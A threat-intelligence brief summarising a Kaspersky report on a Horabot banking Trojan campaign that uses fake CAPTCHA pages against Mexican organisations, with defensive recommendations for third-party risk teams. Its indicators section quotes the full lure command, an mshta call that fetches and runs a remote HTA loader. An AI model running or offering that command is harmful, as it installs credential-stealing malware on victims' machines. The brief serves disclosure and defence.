Horabot Banking Trojan Campaign Uses Fake CAPTCHA Lures to Target Mexican Organizations

Horabot Banking Trojan Campaign Uses Fake CAPTCHA Lures to Target Mexican Organizations

What Happened — A Kaspersky MDR team uncovered a new Horobot‑based campaign in Mexico that chains a fake CAPTCHA page, an HTA loader, server‑side polymorphic scripts, AutoIT‑driven malware, and a banking Trojan. The malicious flow is triggered when victims copy‑paste a crafted mshta command into the Windows Run dialog.

Why It Matters for TPRM —

• The attack leverages legitimate Windows utilities (mshta) and polymorphic code, making detection difficult for traditional AV.
• It targets banking and financial‑related credentials, posing a direct risk to third‑party financial service providers.
• The multi‑stage chain demonstrates how threat actors can embed ransomware‑grade persistence into routine user interactions, increasing supply‑chain exposure.

Who Is Affected — Financial services firms, payroll processors, and any Mexican‑based organization that permits remote execution of HTA/AutoIT scripts.

Recommended Actions —

• Block mshta.exe execution from non‑trusted locations and enforce application whitelisting.
• Deploy behavioral detection rules for AutoIT and HTA activity (e.g., Kaspersky’s PDM signatures).
• Conduct user awareness training on “run‑dialog” social engineering tactics.
• Review third‑party vendor security posture for similar tool misuse.

Technical Notes —

• Attack vector: Phishing via fake CAPTCHA page that instructs victims to run mshta with a malicious URL.
• Payload chain: HTA loader → remote JavaScript → server‑side polymorphic script → AutoIT wrapper → banking Trojan (credential stealer).
• Indicators: mshta https://evs.grupotuis.buzz/0capcha17/DMEENLIGGB.hta, domain evs.grupotuis.buzz, YARA rules published by Kaspersky.

Source: SecureList – Horabot campaign